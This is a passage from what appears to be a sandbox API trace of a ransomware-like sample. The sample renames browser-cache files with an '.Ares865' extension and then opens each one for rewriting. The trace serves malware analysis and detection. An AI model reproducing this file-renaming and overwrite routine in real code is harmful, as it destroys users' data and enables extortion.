Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[2].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.955] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1509) returned 1 [0096.958] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgyIm[1].jpg.Ares865") returned 117 [0096.959] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgyIm[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegyim[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgyIm[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegyim[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.960] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgyIm[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegyim[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.960] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13669) returned 1 [0096.963] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBg3ODX[2].png.Ares865") returned 117 [0096.964] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBg3ODX[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbg3odx[2].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBg3ODX[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbg3odx[2].png.ares865"), dwFlags=0x1) returned 1 [0096.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBg3ODX[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbg3odx[2].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.965] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=243) returned 1 [0096.968] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBiyCq[1].png.Ares865") returned 116 [0096.968] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBiyCq[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbiycq[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBiyCq[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbiycq[1].png.ares865"), dwFlags=0x1) returned 1 [0096.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBiyCq[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbiycq[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.970] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=953) returned 1 [0096.973] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBn4lUU[1].png.Ares865") returned 117 [0096.973] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBn4lUU[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbn4luu[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBn4lUU[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbn4luu[1].png.ares865"), dwFlags=0x1) returned 1 [0096.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBn4lUU[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbn4luu[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.974] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=333) returned 1 [0096.977] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBnMKeN[1].png.Ares865") returned 117 [0096.977] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBnMKeN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbnmken[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBnMKeN[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbnmken[1].png.ares865"), dwFlags=0x1) returned 1 [0096.978] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBnMKeN[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbnmken[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.978] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=587) returned 1 [0096.984] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBwGan9[1].jpg.Ares865") returned 117 [0096.984] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBwGan9[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbwgan9[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBwGan9[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbwgan9[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.985] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBwGan9[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbwgan9[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.985] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14519) returned 1 [0096.989] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBz3ebk[1].png.Ares865") returned 117 [0096.989] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBz3ebk[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbz3ebk[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBz3ebk[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbz3ebk[1].png.ares865"), dwFlags=0x1) returned 1 [0096.990] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBz3ebk[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbz3ebk[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.991] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=876) returned 1 [0096.993] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\benefits-5-mobile[1].png.Ares865") returned 127 [0096.993] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\benefits-5-mobile[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\benefits-5-mobile[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\benefits-5-mobile[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\benefits-5-mobile[1].png.ares865"), dwFlags=0x1) returned 1 [0096.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\benefits-5-mobile[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\benefits-5-mobile[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.995] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10733) returned 1 [0096.998] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cb=gapi[1].loaded_1.Ares865") returned 122 [0096.998] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cb=gapi[1].loaded_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cb=gapi[1].loaded_1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cb=gapi[1].loaded_1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cb=gapi[1].loaded_1.ares865"), dwFlags=0x1) returned 1 [0096.999] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cb=gapi[1].loaded_1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cb=gapi[1].loaded_1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.000] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=81727) returned 1 [0097.006] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\chrome-new[1].jpg.Ares865") returned 120 [0097.006] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\chrome-new[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\chrome-new[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\chrome-new[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\chrome-new[1].jpg.ares865"), dwFlags=0x1) returned 1 [0097.008] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\chrome-new[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\chrome-new[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.008] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=68716) returned 1 [0097.014] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot.Ares865") returned 153 [0097.014] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cjzkeoubrn4kerxqtauh3fy6323mhuzfjmgtvxag2ie[1].eot"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cjzkeoubrn4kerxqtauh3fy6323mhuzfjmgtvxag2ie[1].eot.ares865"), dwFlags=0x1) returned 1 [0097.016] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cjzkeoubrn4kerxqtauh3fy6323mhuzfjmgtvxag2ie[1].eot.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.016] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18233) returned 1 [0097.019] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[1].js.Ares865") returned 121 [0097.019] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[1].js.ares865"), dwFlags=0x1) returned 1 [0097.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.021] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1969) returned 1 [0097.024] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[2].js.Ares865") returned 121 [0097.024] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[2].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[2].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[2].js.ares865"), dwFlags=0x1) returned 1 [0097.025] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[2].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[2].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.026] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1969) returned 1 [0097.028] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\css[2].txt.Ares865") returned 113 [0097.028] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\css[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\css[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\css[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\css[2].txt.ares865"), dwFlags=0x1) returned 1 [0097.029] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\css[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\css[2].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.030] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=187) returned 1 [0097.033] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\desktop.ini.Ares865") returned 114 [0097.033] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0097.034] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.035] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0097.038] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\f8-028d9f-f30905ea[1].Ares865") returned 124 [0097.038] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\f8-028d9f-f30905ea[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\f8-028d9f-f30905ea[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\f8-028d9f-f30905ea[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\f8-028d9f-f30905ea[1].ares865"), dwFlags=0x1) returned 1 [0097.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\f8-028d9f-f30905ea[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\f8-028d9f-f30905ea[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.039] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=236065) returned 1 [0097.056] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\fallback_728x90[1].jpg.Ares865") returned 125 [0097.056] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\fallback_728x90[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\fallback_728x90[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\fallback_728x90[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\fallback_728x90[1].jpg.ares865"), dwFlags=0x1) returned 1 [0097.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\fallback_728x90[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\fallback_728x90[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.059] GetFileSizeEx (in: hFile=0x118, 